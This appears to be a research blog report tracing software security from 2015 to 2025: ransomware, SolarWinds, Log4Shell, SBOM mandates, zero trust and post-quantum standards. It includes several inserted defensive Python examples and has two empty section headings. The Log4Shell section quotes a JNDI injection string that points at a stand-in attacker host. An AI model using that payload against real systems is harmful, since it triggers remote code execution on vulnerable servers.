Research Analysis By Jim Venuto · December 29, 2025

The Decade of Trust and Transformation

A Comprehensive Analysis of Software Lifecycle Security Evolution (2015–2025)

10 Years Analyzed
69 Sources Cited
∞→0 Trust Model Shift

1. Introduction: The Industrialization of Digital Risk

The transformation of software security from 2015 to 2025 represents one of the most profound shifts in the history of information technology. What began as a technical discipline—often relegated to the periphery of IT operations—has metamorphosed into a geopolitical imperative, a boardroom priority, and a fundamental component of national defense.

This report provides an exhaustive analysis of this decade-long evolution, examining how the mechanisms of trust, verification, and resilience have been rewritten in the face of escalating threats and radical technological change.

In 2015, the prevailing security model was predicated on "implicit trust." Organizations trusted their internal networks, trusted their software vendors, and trusted the open-source libraries they integrated into their applications. Security was a gatekeeper function, often positioned at the end of the development lifecycle, tasked with finding vulnerabilities in code that had already been written. By 2025, this model has been entirely dismantled. The industry has moved to a paradigm of "Zero Trust" and "explicit verification," driven by a relentless series of supply chain compromises, the weaponization of open-source ecosystems, and the integration of artificial intelligence into both offensive and defensive operations.

This report serves as an authoritative resource for security professionals, synthesizing data from threat intelligence reports, regulatory frameworks, and technological analyses to construct a cohesive narrative of change. We will explore how the breakdown of the traditional perimeter forced a rethinking of identity and access; how the rise of DevOps necessitated integrating security into the earliest stages of design; and how the regulatory landscape shifted from voluntary guidelines to mandatory liability. Furthermore, we examine the specific catalysts—from the indiscriminately destructive ransomware campaigns of 2017 to the precision engineering of the SolarWinds compromise—that forced these changes.

The following analysis is structured chronologically and thematically, dissecting the era into three distinct periods: the Early Period (2015–2018), characterized by compliance and the struggle to adapt to Agile; the Mid-Period (2019–2022), defined by the shattering of supply chain trust; and the Current State (2023–2025), dominated by AI, platform consolidation, and post-quantum preparation.

1.1 The Defining Metrics of Change

To understand the scale of the evolution, it is essential to quantify the shifting metrics of success and failure over the decade. The following comparison illustrates the fundamental restructuring of the security paradigm.

Feature | State in 2015 | State in 2025
Primary Defense Model | Perimeter-based (Firewalls, VPNs) | Zero Trust & Identity-Centric
Release Velocity | Monthly/Quarterly (Waterfall) | Continuous (Daily/Hourly)
Vulnerability Management | CVSS Score (Severity) | Risk Context (Reachability/Exploitability)
Supply Chain Trust | Implicit Trust in Vendors | SBOMs & Attestation (Explicit Verification)
Regulatory Stance | Voluntary Guidelines | Mandatory Liability (EO 14028, NIS2)
AI Utilization | Theoretical / Research | Operational (GenAI Coding & Defense)
Cryptography Standard | RSA/ECC Standard | Migration to Post-Quantum (FIPS 203/204)
Security Responsibility | Segregated Security Team | Shared Responsibility (DevSecOps)

Era I: 2015–2018

Early Period Analysis: The Compliance Catalyst and the Perimeter's Last Stand

The years from 2015 to 2018 were defined by a collision between legacy security models and the accelerating pace of digital business. While the software development world was rapidly adopting Agile and DevOps methodologies to accelerate delivery, security teams were often left behind, clinging to manual review processes and perimeter-based defenses that could not keep pace. This period also marked the end of the "wild west" of data privacy, as Europe's General Data Protection Regulation (GDPR) made data protection a legal requirement rather than a best practice.

2.1 The Baseline Security Posture: Silos and Scans

In 2015, the software security landscape was still heavily influenced by the Waterfall methodology. Security testing was typically a distinct phase that occurred after development was complete, often weeks before a scheduled release. This "penetration test and patch" model created significant friction. When vulnerabilities were discovered, developers had already moved on to new projects, making remediation costly and time-consuming. [1]

The primary tools of the trade were Static Application Security Testing (SAST) and Dynamic Application Security Testing (DAST). However, these tools were often run in isolation. SAST tools, analyzing source code, were notorious for high false-positive rates, flagging theoretical vulnerabilities that were technically unreachable in production. This led to "alert fatigue," where developers would ignore security warnings to meet deadlines. DAST tools, scanning running applications, provided a "hacker's view" but lacked visibility into the underlying code, making it difficult for teams to pinpoint the exact location of a flaw. [3]

Vulnerability management during this period was driven almost exclusively by the Common Vulnerability Scoring System (CVSS). Security teams would hand developers massive PDF reports of vulnerabilities, ranked solely by theoretical severity, without context regarding whether the vulnerable component was actually loaded into memory or exposed to the internet. This lack of context created a massive backlog of "technical debt" that organizations struggled to manage. [5] The prevailing sentiment was that security was the "Department of No," a blocker to innovation rather than an enabler. [2]

2.2 The Threat Landscape: Ransomware and Wormable Exploits

The threat landscape of the early period was characterized by indiscriminate, "spray-and-pray" attacks rather than the highly targeted supply chain operations that would define later years. Attackers focused on exploiting known vulnerabilities in unpatched systems, leveraging the lag time between patch release and deployment.

2.2.1 The Year of Ransomware (2017)

The pivotal events of this era were the WannaCry and NotPetya attacks in 2017. These incidents exploited the EternalBlue vulnerability (MS17-010) in the Windows SMB protocol—a vulnerability that Microsoft had released a patch for months earlier. Unlike modern ransomware, which often involves human-operated lateral movement, these threats were "wormable": once they infected a single machine within a network, they spread automatically to every other vulnerable system. [6]

Impact Assessment

WannaCry demonstrated the catastrophic potential of neglecting basic cyber hygiene. It infected over 200,000 computers across 150 countries within days, crippling the UK's National Health Service (NHS) and forcing ambulances to divert. NotPetya, initially disguised as ransomware, was later identified as a wiper designed to destroy data. It caused an estimated $10 billion in damages globally, paralyzing shipping giants like Maersk and pharmaceutical companies like Merck. [7]

2.2.2 The Rise of Fileless Malware and Cryptojacking

As organizations improved their file-based malware detection (antivirus), attackers adapted. The 2017-2018 period saw a surge in "fileless" attacks—exploits that run in memory using native system tools like PowerShell or WMI without dropping malicious files to disk. By 2017, fileless attacks were ten times more likely to succeed than traditional file-based malware, complicating forensic analysis and detection. [8]

Simultaneously, the booming value of cryptocurrency gave rise to cryptojacking. Threat actors shifted from stealing data to stealing compute cycles, installing unauthorized mining software on corporate servers. This was often achieved through unpatched vulnerabilities in web applications. The same class of weakness lay behind the 2017 breach of Equifax: an unpatched Apache Struts vulnerability led to the theft of 146 million personal records. This incident served as a brutal lesson in the necessity of Software Composition Analysis (SCA), that is, knowing what open-source components are running in production environments. [8]

2.3 The Regulatory Catalyst: GDPR and Privacy by Design

May 2018 marked a watershed moment with the enforcement of the General Data Protection Regulation (GDPR). This regulation fundamentally altered software architecture requirements, moving privacy from a legal disclaimer to a functional requirement.

Privacy by Design, mandated by Article 25 of GDPR, forced software architects to consider data minimization, pseudonymization, and encryption at the earliest stages of the System Development Life Cycle (SDLC). It was no longer acceptable to bolt on security features at the end; privacy controls had to be embedded in the application's core logic. [10]
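
To make two of the Article 25 techniques concrete, here is an added example (not part of the original report) of a record minimizer for an analytics export: it drops the fields the downstream use does not need, generalizes the quasi-identifiers it keeps, and replaces the email with a keyed pseudonym so records can still be joined. The record, the field policy and the key are constructed for the example; HMAC-SHA256 is one common way to build a pseudonym that only the key holder can recompute, not something the Regulation prescribes.

```python
import hashlib
import hmac

# Constructed sample record; no real person's data.
RAW_RECORD = {
    "email": "alice@example.com",
    "full_name": "Alice Example",
    "date_of_birth": "1988-04-12",
    "postcode": "SW1A 1AA",
    "purchase_total": 42.50,
    "session_id": "abc123",
}

# Constructed secret; in production this comes from a KMS or secrets store
# and is never stored alongside the pseudonymized data.
PSEUDONYM_KEY = b"example-only-pseudonym-key-rotate-me"

# Field policy (an assumption for this example): what the analytics use needs,
# what must be pseudonymized for joins, and what can be generalized.
FIELDS_TO_KEEP = {"purchase_total"}
FIELDS_TO_PSEUDONYMIZE = {"email"}
FIELDS_TO_GENERALIZE = {"date_of_birth": "year", "postcode": "area"}


def pseudonymize(value: str, key: bytes) -> str:
    """Keyed hash (HMAC-SHA256): stable for the same input and key, so records
    can still be joined, but not recomputable or reversible without the key."""
    normalized = value.strip().lower().encode("utf-8")
    return hmac.new(key, normalized, hashlib.sha256).hexdigest()


def generalize(field: str, value: str, mode: str) -> str:
    """Coarsen a quasi-identifier to reduce re-identification risk."""
    if mode == "year":
        return value[:4]                 # "1988-04-12" -> "1988"
    if mode == "area":
        return value.split(" ")[0]       # "SW1A 1AA"   -> "SW1A"
    raise ValueError(f"no generalization {mode!r} defined for {field}")


def minimize_record(record: dict, key: bytes) -> dict:
    """Apply the field policy; any field not covered by it is dropped."""
    out = {}
    for field, value in record.items():
        if field in FIELDS_TO_KEEP:
            out[field] = value
        elif field in FIELDS_TO_PSEUDONYMIZE:
            out[field + "_pseudonym"] = pseudonymize(value, key)
        elif field in FIELDS_TO_GENERALIZE:
            out[field] = generalize(field, value, FIELDS_TO_GENERALIZE[field])
    return out
```

The key must live outside the dataset, because anyone holding both the key and the export can re-identify every record; that separation is what makes the output pseudonymous rather than anonymous in the Regulation's sense, and it is why the policy is applied before the record crosses the trust boundary rather than after.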

The regulation also introduced strict breach notification requirements. Organizations were required to report data breaches within 72 hours of discovery. This forced companies to improve their incident detection and response capabilities drastically. The economic calculus of security shifted overnight; non-compliance could result in fines of up to 4% of global annual turnover or €20 million, making software security a board-level concern for the first time. [12]

The Cambridge Analytica scandal in early 2018 further amplified the public demand for data privacy. It underscored the risks associated with third-party API access and data mishandling, compelling platforms to lock down their ecosystems and developers to undergo more rigorous scrutiny. [12]

2.4 The Birth of DevSecOps

By 2018, the friction of the "security gate" model became untenable in the face of accelerating release cycles. Leading organizations began experimenting with DevSecOps—the philosophy of integrating security practices into the DevOps process.

"Shift Left" gained traction, advocating for moving security testing earlier in the lifecycle—to the developer's desktop or the commit stage—rather than waiting for the testing phase.

Early adopters began automating SAST and dependency checks within CI/CD pipelines (e.g., Jenkins, GitLab). However, this integration was often clumsy. Traditional security tools were not designed for the speed of DevOps; slow scans would break builds, frustrating developers and leading to disabled security checks. [1]

Despite these early challenges, the foundation was laid. The recognition that modern applications were composed of 80-90% open-source code drove the initial adoption of SCA tools. The industry began to understand that securing the software supply chain was as critical as securing the proprietary code written in-house. [9]

Era II: 2019–2022

Mid-Period Transformation: The Supply Chain Awakening and the Identity Crisis

If the early period was defined by compliance and perimeter defense, the mid-period was defined by the shattering of trust. Two specific events—the SolarWinds compromise and the Log4j vulnerability—fundamentally rewrote the rulebook for software security, demonstrating that the threat was no longer just attacking the application, but building the application.

3.1 The SolarWinds Compromise (2020): The Build System as a Target

In December 2020, the disclosure of the SolarWinds Sunburst attack revealed a terrifying new reality: attackers had compromised the software supply chain itself. This was not a traditional hack where attackers exploit a vulnerability to gain entry; it was an injection of malice into the trusted distribution mechanism.

The Mechanics of the Attack

Russian state-sponsored actors (Nobelium) compromised the SolarWinds build system (TeamCity). They injected malicious code, known as Sunspot, into the build pipeline. This malware monitored the build server for the compilation of the SolarWinds.Orion.Core.BusinessLayer.dll. When detected, Sunspot replaced the legitimate source code file with a malicious version that contained a backdoor. The compiler built the malicious code, and the resulting binary was digitally signed by SolarWinds. [16]

The Implications: Thousands of organizations, including US federal agencies and Fortune 500 companies, downloaded a digitally signed, "trusted" update that was, in fact, malware. This destroyed the longstanding assumption that "signed code is safe code." It demonstrated that verifying the integrity of the finished binary was insufficient; organizations needed to verify the integrity of the process that created it. [18]

The Industry Response: This event catalyzed the focus on Software Bill of Materials (SBOMs) and build integrity. It shifted the conversation from "application security" to "software supply chain security." Frameworks like SLSA (Supply-chain Levels for Software Artifacts) emerged to provide standards for securing the build environment and ensuring provenance. [17]
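
The following is an added example, not SolarWinds, SLSA or in-toto code, of what "verifying the process" looks like from the consumer's side: a deployment step that checks a build provenance statement against the artifact it is about to install. The statement is modelled on the in-toto Statement and SLSA provenance layout but trimmed to the fields used; the builder id, repository URI and commit digest are placeholders, and the artifact is a constructed byte string.

```python
import hashlib

# Policy inputs (constructed placeholders, not SolarWinds values):
# the builders we accept provenance from, and the commit that was reviewed.
TRUSTED_BUILDERS = {"https://ci.example.internal/builders/hermetic-v1"}
EXPECTED_SOURCE = {
    "uri": "git+https://git.example.internal/orion/core",
    "commit": "0123456789abcdef0123456789abcdef01234567",  # placeholder digest
}

# Constructed artifact standing in for a compiled library.
ARTIFACT = b"constructed build output bytes"


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed provenance, modelled on the in-toto Statement / SLSA provenance
# layout but reduced to the fields this check consumes.
PROVENANCE = {
    "_type": "https://in-toto.io/Statement/v1",
    "subject": [{"name": "Core.BusinessLayer.dll",
                 "digest": {"sha256": sha256_hex(ARTIFACT)}}],
    "predicateType": "https://slsa.dev/provenance/v1",
    "predicate": {
        "buildDefinition": {
            "resolvedDependencies": [{
                "uri": EXPECTED_SOURCE["uri"],
                "digest": {"gitCommit": EXPECTED_SOURCE["commit"]},
            }],
        },
        "runDetails": {"builder": {"id": "https://ci.example.internal/builders/hermetic-v1"}},
    },
}


def verify_provenance(artifact: bytes, statement: dict,
                      trusted_builders: set, expected_source: dict) -> list:
    """Return a list of policy failures; an empty list means accept.

    Assumes the statement's signature envelope has ALREADY been verified
    against the build platform's key; these checks only evaluate the claims."""
    failures = []
    if statement.get("_type") != "https://in-toto.io/Statement/v1":
        failures.append("unexpected statement type")
    if statement.get("predicateType") != "https://slsa.dev/provenance/v1":
        failures.append("unexpected predicate type")

    # 1. The artifact about to be installed must be the one the build produced.
    digest = sha256_hex(artifact)
    if not any(s.get("digest", {}).get("sha256") == digest
               for s in statement.get("subject", [])):
        failures.append("artifact digest not listed in provenance subject")

    predicate = statement.get("predicate", {})

    # 2. Only an isolated, platform-operated builder is trusted to vouch for the build.
    builder = predicate.get("runDetails", {}).get("builder", {}).get("id")
    if builder not in trusted_builders:
        failures.append(f"untrusted builder: {builder}")

    # 3. The build must have consumed exactly the reviewed source commit;
    #    anything built from other inputs is rejected.
    deps = predicate.get("buildDefinition", {}).get("resolvedDependencies", [])
    if not any(d.get("uri") == expected_source["uri"] and
               d.get("digest", {}).get("gitCommit") == expected_source["commit"]
               for d in deps):
        failures.append("provenance source does not match the reviewed commit")
    return failures
```

Checks 1 to 3 only mean something if the statement was produced and signed by the build platform itself and its envelope signature was verified first: a compromised build host can forge any claim about itself, which is why the SLSA build levels require provenance to be generated by the platform rather than by user-defined build steps.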

3.2 The Log4j Firestorm (2021): The Ubiquity of Risk

Just a year later, in December 2021, the discovery of Log4Shell (CVE-2021-44228) in the Apache Log4j library demonstrated the profound fragility of the open-source ecosystem.

The Vulnerability: A feature in Log4j known as JNDI (Java Naming and Directory Interface) lookups allowed unauthenticated remote code execution (RCE). An attacker could trigger this simply by logging a specific string (e.g., ${jndi:ldap://attacker.com/exploit}). Because Log4j is a logging library, it handles data from potentially untrusted sources—such as HTTP headers, chat messages, and input fields—making the attack surface ubiquitous. [21]

The Response Challenge: Unlike SolarWinds, which required patching a single vendor product, Log4j was embedded in thousands of downstream dependencies. Many organizations struggled to identify where Log4j existed in their environments because it was often a "transitive dependency"—a library used by a library used by their application. Security teams were forced to manually scour file systems, revealing the inadequacy of existing asset management practices. [24]

Legacy of Log4j: This incident proved that manual software inventory was obsolete. It directly accelerated the adoption of automated SCA tools and validated the necessity of the SBOM mandates that would follow. It also birthed the widespread demand for VEX (Vulnerability Exploitability eXchange) documents, allowing vendors to communicate not just what they used, but whether it was actually exploitable. [26]
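
As an added example (not part of the original report) of the inventory problem described above, here is a small SBOM consumer: it walks a CycloneDX-style dependency graph from the application root, lists every transitive chain that ends in log4j-core, checks the version against the CVE-2021-44228 fix line, and attaches the supplier's VEX status. The SBOM, the dependency graph, the VEX statements and every library other than log4j-core are constructed for the example; the CycloneDX field names (components, dependencies, bom-ref, dependsOn) are the ones that format uses.

```python
from collections import deque

LOG4J_GROUP, LOG4J_NAME = "org.apache.logging.log4j", "log4j-core"
CVE = "CVE-2021-44228"

# Constructed SBOM in CycloneDX JSON shape (component list + dependency graph).
SBOM = {
    "bomFormat": "CycloneDX",
    "specVersion": "1.5",
    "metadata": {"component": {"bom-ref": "app", "name": "billing-service", "version": "3.2.0"}},
    "components": [
        {"bom-ref": "pkg:maven/org.springframework.boot/spring-boot-starter-web@2.5.6",
         "group": "org.springframework.boot", "name": "spring-boot-starter-web", "version": "2.5.6"},
        {"bom-ref": "pkg:maven/com.example/audit-lib@1.4.0",
         "group": "com.example", "name": "audit-lib", "version": "1.4.0"},
        {"bom-ref": "pkg:maven/com.example/reporting-lib@0.9.0",
         "group": "com.example", "name": "reporting-lib", "version": "0.9.0"},
        {"bom-ref": "pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1",
         "group": LOG4J_GROUP, "name": LOG4J_NAME, "version": "2.14.1"},
        {"bom-ref": "pkg:maven/org.apache.logging.log4j/log4j-core@2.17.1",
         "group": LOG4J_GROUP, "name": LOG4J_NAME, "version": "2.17.1"},
    ],
    "dependencies": [
        {"ref": "app", "dependsOn": ["pkg:maven/org.springframework.boot/spring-boot-starter-web@2.5.6",
                                     "pkg:maven/com.example/reporting-lib@0.9.0"]},
        {"ref": "pkg:maven/org.springframework.boot/spring-boot-starter-web@2.5.6",
         "dependsOn": ["pkg:maven/com.example/audit-lib@1.4.0"]},
        {"ref": "pkg:maven/com.example/audit-lib@1.4.0",
         "dependsOn": ["pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1"]},
        {"ref": "pkg:maven/com.example/reporting-lib@0.9.0",
         "dependsOn": ["pkg:maven/org.apache.logging.log4j/log4j-core@2.17.1"]},
    ],
}

# Constructed VEX statements, one per (vulnerability, product), as a supplier would publish.
VEX = [
    {"vulnerability": CVE, "product": "pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1", "status": "affected"},
    {"vulnerability": CVE, "product": "pkg:maven/org.apache.logging.log4j/log4j-core@2.17.1", "status": "fixed"},
]


def parse_version(v: str) -> tuple:
    """'2.14.1' -> (2, 14, 1); a pre-release suffix such as '-beta9' is dropped."""
    return tuple(int(p) for p in v.split("-")[0].split("."))


def version_affected(v: str) -> bool:
    # CVE-2021-44228 applies to the 2.x line before the 2.15.0 fix release.
    return (2,) <= parse_version(v) < (2, 15, 0)


def find_paths(sbom: dict, group: str, name: str) -> list:
    """Breadth-first walk from the application root, returning every
    dependency chain that ends at the named component."""
    comps = {c["bom-ref"]: c for c in sbom["components"]}
    edges = {d["ref"]: d.get("dependsOn", []) for d in sbom["dependencies"]}
    root = sbom["metadata"]["component"]["bom-ref"]
    paths, queue = [], deque([[root]])
    while queue:
        path = queue.popleft()
        for child in edges.get(path[-1], []):
            if child in path:          # cycle guard
                continue
            comp = comps.get(child, {})
            if comp.get("group") == group and comp.get("name") == name:
                paths.append(path + [child])
            queue.append(path + [child])
    return paths


def assess(sbom: dict, vex: list, cve: str = CVE) -> list:
    """One finding per chain: where the library sits, whether the version is in
    the affected range, and what the supplier's VEX says about it."""
    comps = {c["bom-ref"]: c for c in sbom["components"]}
    status = {(s["vulnerability"], s["product"]): s["status"] for s in vex}
    findings = []
    for path in find_paths(sbom, LOG4J_GROUP, LOG4J_NAME):
        ref = path[-1]
        version = comps[ref]["version"]
        findings.append({
            "path": " -> ".join(path),
            "depth": len(path) - 1,
            "version": version,
            "version_in_affected_range": version_affected(version),
            "vex_status": status.get((cve, ref), "no VEX statement"),
        })
    return findings
```

The path output is the remediation step: the affected copy is pulled in by audit-lib, two levels below the dependency the team actually declared, so the fix is a dependency override or an upgrade of that transitive library, not an edit to the application's own imports. A VEX status of "no VEX statement" is treated as unknown rather than safe.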

3.3 Executive Order 14028 (2021): The Regulatory Hammer

In response to these crises, the Biden Administration issued Executive Order 14028 ("Improving the Nation's Cybersecurity") in May 2021. This was the most aggressive federal intervention in software security history, leveraging the US government's purchasing power to drive industry-wide change.

Section 4: Mandating SBOMs

Required software developers selling to the federal government to provide a Software Bill of Materials. This effectively forced the industry to adopt transparency standards like SPDX and CycloneDX, turning SBOMs from a niche concept into a procurement requirement. [20]

Zero Trust Architecture

Mandated that federal agencies move toward Zero Trust architectures, acknowledging that the perimeter defense model had failed. This pushed the private sector to follow suit, prioritizing identity verification over network location. [28]

NIST SP 800-218: Secure Software Development Framework (SSDF)

NIST was tasked with defining "critical software" and establishing security standards. This moved "secure coding" from a best practice to a regulatory expectation, requiring vendors to attest to their development practices. [31]

3.4 The Dissolution of the Perimeter: Remote Work and Zero Trust

The COVID-19 pandemic, beginning in 2020, forced a rapid, unplanned migration to remote work. The traditional "castle-and-moat" security model, where everything inside the corporate VPN was trusted, collapsed under the strain.

Identity as the New Perimeter: With employees accessing SaaS applications from home networks and personal devices, Identity and Access Management (IAM) became the primary control plane. Multi-Factor Authentication (MFA) moved from optional to mandatory. The concept of "trusting the network" was abandoned in favor of verifying the user and the device for every request. [33]

VPN Vulnerabilities: As reliance on VPNs surged, they became prime targets for attackers. Critical vulnerabilities in Pulse Secure, Citrix, and Fortinet VPN concentrators were relentlessly exploited by state actors and ransomware gangs. This further drove the argument for Zero Trust solutions, such as Secure Access Service Edge (SASE), which broker connections to specific applications without placing the user on the network layer. [6]

3.5 Methodological Shifts: GitOps and Infrastructure as Code

During this period, the operational side of security evolved through the adoption of Infrastructure as Code (IaC).

Security as Code: With infrastructure defined in code (e.g., Terraform, Kubernetes manifests), security teams could scan environments for misconfigurations before deployment. Tools like Checkov, Trivy, and Snyk IaC emerged to scan for open S3 buckets, permissive security groups, or unencrypted databases in the CI/CD pipeline. [15]
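
An added example, not the code of Checkov, Trivy or Snyk IaC, of the kind of pre-deployment check those tools run: three rules evaluated over a Terraform plan in its JSON form. The planned_values.root_module.resources layout is the real plan shape, though only the root module is walked here; the plan, resource names and rule ids are constructed, with an offending and a compliant resource of each type so the output shows exactly what the pipeline gate blocks.

```python
# Constructed Terraform plan (JSON shape), one bad and one good resource per type.
PLAN = {"planned_values": {"root_module": {"resources": [
    {"address": "aws_security_group.bastion", "type": "aws_security_group",
     "values": {"ingress": [{"from_port": 22, "to_port": 22, "protocol": "tcp",
                             "cidr_blocks": ["0.0.0.0/0"]}]}},
    {"address": "aws_security_group.web", "type": "aws_security_group",
     "values": {"ingress": [{"from_port": 443, "to_port": 443, "protocol": "tcp",
                             "cidr_blocks": ["0.0.0.0/0"]}]}},
    {"address": "aws_s3_bucket.logs", "type": "aws_s3_bucket",
     "values": {"bucket": "example-logs", "acl": "public-read"}},
    {"address": "aws_s3_bucket.private", "type": "aws_s3_bucket",
     "values": {"bucket": "example-private", "acl": "private"}},
    {"address": "aws_db_instance.orders", "type": "aws_db_instance",
     "values": {"storage_encrypted": False, "publicly_accessible": True}},
    {"address": "aws_db_instance.orders_fixed", "type": "aws_db_instance",
     "values": {"storage_encrypted": True, "publicly_accessible": False}},
]}}}

ADMIN_PORTS = {22, 3389}            # SSH and RDP
WORLD = {"0.0.0.0/0", "::/0"}       # "anyone on the internet"


def check_security_group(res):
    """Flag ingress rules that expose an administrative port to the world.
    A public 443 is a normal web listener and is not flagged."""
    for rule in res["values"].get("ingress", []):
        cidrs = set(rule.get("cidr_blocks", [])) | set(rule.get("ipv6_cidr_blocks", []))
        if not cidrs & WORLD:
            continue
        lo, hi = rule.get("from_port", 0), rule.get("to_port", 65535)
        if any(lo <= port <= hi for port in ADMIN_PORTS):
            yield "SG001", f"administrative port range {lo}-{hi} open to the world"


def check_s3_bucket(res):
    if res["values"].get("acl") in {"public-read", "public-read-write"}:
        yield "S3001", "bucket ACL grants public access"


def check_db_instance(res):
    values = res["values"]
    if not values.get("storage_encrypted", False):
        yield "DB001", "database storage is not encrypted at rest"
    if values.get("publicly_accessible", False):
        yield "DB002", "database is publicly accessible"


CHECKS = {
    "aws_security_group": check_security_group,
    "aws_s3_bucket": check_s3_bucket,
    "aws_db_instance": check_db_instance,
}


def scan_plan(plan: dict) -> list:
    """Run every applicable rule over every planned resource (root module only)."""
    findings = []
    for res in plan["planned_values"]["root_module"]["resources"]:
        for rule_id, message in CHECKS.get(res["type"], lambda r: [])(res):
            findings.append({"address": res["address"], "rule": rule_id, "message": message})
    return findings


def gate(plan: dict) -> bool:
    """True when the pipeline may apply the plan, i.e. no findings."""
    return not scan_plan(plan)
```

Running the check against the plan rather than against the live account is what makes this a shift-left control: the misconfiguration is rejected before any resource exists, and the finding points at the Terraform address the developer can fix.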

GitOps: The practice of using Git as the single source of truth for infrastructure meant that every change was versioned and auditable. This improved the ability to detect unauthorized changes (configuration drift), a key defense against the persistence mechanisms attackers use. It enabled a model where operational changes were subject to the same rigorous review processes as application code. [36]

Era III: 2023–2025

Current State Assessment: The Age of AI, Platforms, and Post-Quantum Preparation

By 2023, the industry had internalized the hard lessons of the supply chain crisis. The focus shifted to consolidation—managing the sprawl of security tools—and navigating the dual-edged sword of Artificial Intelligence. Simultaneously, the looming threat of quantum computing forced a transition to new cryptographic standards.

4.1 From Silos to Platforms: The Rise of ASPM

One of the most significant shifts in the 2023-2025 period was the move away from disjointed scanners toward Application Security Posture Management (ASPM).

The Problem: Developers were drowning in alerts from separate SAST, DAST, SCA, and IaC tools. Security teams lacked a unified view of risk. A vulnerability might be rated "Critical" in a library, but if that library was never loaded into memory or the vulnerable function was never called, prioritizing it was a waste of resources. [37]

The Solution: ASPM platforms emerged to ingest data from all stages of the SDLC (code, build, deploy, runtime). They correlate findings to determine exploitability and reachability.

4.2 The AI Revolution: Offense, Defense, and Development

The explosive adoption of Generative AI (GenAI) in 2023-2025 reshaped every aspect of the threat landscape.

4.2.1 AI in Development (The "Vibe Coding" Risk)

Developers increasingly relied on AI coding assistants like GitHub Copilot and Amazon Q. By 2025, nearly a quarter of production code was AI-generated. [43]

4.2.2 AI in Offense

4.2.3 AI in Defense

4.3 Regulatory Hardening: CISA Attestation and Cyber Trust Mark

Regulation moved from high-level orders to specific, enforceable mechanics.

CISA Self-Attestation (2024): The "Common Form" required software producers selling to the US government to attest to specific secure development practices (derived from NIST SSDF). Crucially, the CEO or a designee had to sign the attestation, introducing personal liability for false statements. This shifted security from a technical issue to a corporate governance issue. [50]

US Cyber Trust Mark (2024-2025): The FCC launched a voluntary labeling program for IoT devices. Consumers could scan a QR code to see a device's security status (updates, privacy policy). While voluntary, it began to create a market differentiator, pressuring manufacturers to improve baseline security to avoid being competitively disadvantaged. [53]

4.4 Preparing for Y2Q: Post-Quantum Cryptography

With the looming threat of cryptographically relevant quantum computers (CRQC) capable of breaking RSA and ECC encryption (Shor's algorithm), NIST finalized the first set of Post-Quantum Cryptography (PQC) standards in August 2024.

The New Standards

FIPS 203 ML-KEM — For general encryption and key encapsulation
FIPS 204 ML-DSA — For digital signatures
FIPS 205 SLH-DSA — A hash-based backup for signatures

CNSA 2.0 Timeline: The NSA issued strict deadlines for National Security Systems (NSS). They must support these algorithms by 2025 for new software and be fully migrated by 2030 (for signatures) and 2033 (for encryption). This triggered a massive "cryptographic inventory" effort across the industry to identify where legacy crypto was hardcoded, creating a rush for Cryptographic Agility. [59]

Synthesis

5. Key Shifts Analysis: Synthesizing the Decade

The evolution from 2015 to 2025 represents a fundamental restructuring of the security paradigm. These are the macro-trends that define the era.

5.1 From "Finding Bugs" to "Managing Risk" (Context over Count)

In 2015, success was measured by the number of vulnerabilities found. In 2025, it is measured by the reduction in risk.

The Shift: The introduction of ASPM and Runtime Context fundamentally changed prioritization. Security teams no longer demand that "all Criticals be fixed." They demand that "all exploitable Criticals be fixed." This bridged the gap between Dev and Sec, as developers were no longer asked to fix irrelevant bugs. [37]
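
An added example (not from the report or any ASPM vendor) of the prioritization shift described in 4.1 and here in 5.1: the same five findings ranked by CVSS alone and then by CVSS combined with reachability, runtime loading, exposure, exploitation intelligence and VEX status. The findings, component names and multipliers are constructed for illustration; the weights are not a published standard.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    id: str
    component: str
    cvss: float                 # base severity, the only input a 2015 workflow had
    reachable: bool             # call-graph analysis: vulnerable function is on a call path
    loaded_at_runtime: bool     # runtime sensor observed the library loaded
    internet_exposed: bool      # the workload accepts traffic from the internet
    exploited_in_wild: bool     # threat intel reports active exploitation
    vex_status: str = "under_investigation"


# Constructed findings; components and values are illustrative only.
FINDINGS = [
    Finding("F-1", "legacy-xml-parser", 9.8, reachable=False, loaded_at_runtime=False,
            internet_exposed=False, exploited_in_wild=False),
    Finding("F-2", "http-router", 7.5, reachable=True, loaded_at_runtime=True,
            internet_exposed=True, exploited_in_wild=True),
    Finding("F-3", "image-codec", 9.1, reachable=True, loaded_at_runtime=True,
            internet_exposed=True, exploited_in_wild=False, vex_status="not_affected"),
    Finding("F-4", "auth-middleware", 5.3, reachable=True, loaded_at_runtime=True,
            internet_exposed=True, exploited_in_wild=False),
    Finding("F-5", "batch-scheduler", 8.8, reachable=True, loaded_at_runtime=True,
            internet_exposed=False, exploited_in_wild=False),
]

# Multipliers are this example's own assumptions.
WEIGHTS = {"unreachable": 0.2, "not_loaded": 0.3, "internal_only": 0.7,
           "internet_exposed": 1.5, "exploited": 1.5}


def risk_score(f: Finding) -> float:
    """CVSS scaled by context, capped at 10 so it stays on a familiar scale.
    A supplier VEX of not_affected removes the finding from the queue entirely."""
    if f.vex_status == "not_affected":
        return 0.0
    score = f.cvss
    score *= 1.0 if f.reachable else WEIGHTS["unreachable"]
    score *= 1.0 if f.loaded_at_runtime else WEIGHTS["not_loaded"]
    score *= WEIGHTS["internet_exposed"] if f.internet_exposed else WEIGHTS["internal_only"]
    score *= WEIGHTS["exploited"] if f.exploited_in_wild else 1.0
    return round(min(score, 10.0), 2)


def severity_order(findings) -> list:
    """The 2015 queue: highest CVSS first."""
    return [f.id for f in sorted(findings, key=lambda f: -f.cvss)]


def risk_order(findings) -> list:
    """The context-aware queue: highest contextual risk first."""
    return [f.id for f in sorted(findings, key=lambda f: -risk_score(f))]


def must_fix_now(findings, threshold: float = 7.0) -> list:
    """'All exploitable Criticals': only findings whose contextual risk clears the bar."""
    return [f.id for f in findings if risk_score(f) >= threshold]
```

The two orderings invert: the 9.8 in a library that is never loaded drops to the bottom, while the 7.5 in an internet-facing, actively exploited component rises to the top, and the developer's immediate list shrinks from five items to two.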

5.2 From "Trust but Verify" to "Zero Trust"

The perimeter model assumed that trust could be established by location (inside the VPN). The modern model assumes breach.

The Shift: Identity is the new control plane. Access to source code, build systems, and production environments is now governed by continuous authentication, least-privilege, and device health checks. The SolarWinds attack proved that even the build pipeline cannot be trusted implicitly. [16]
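
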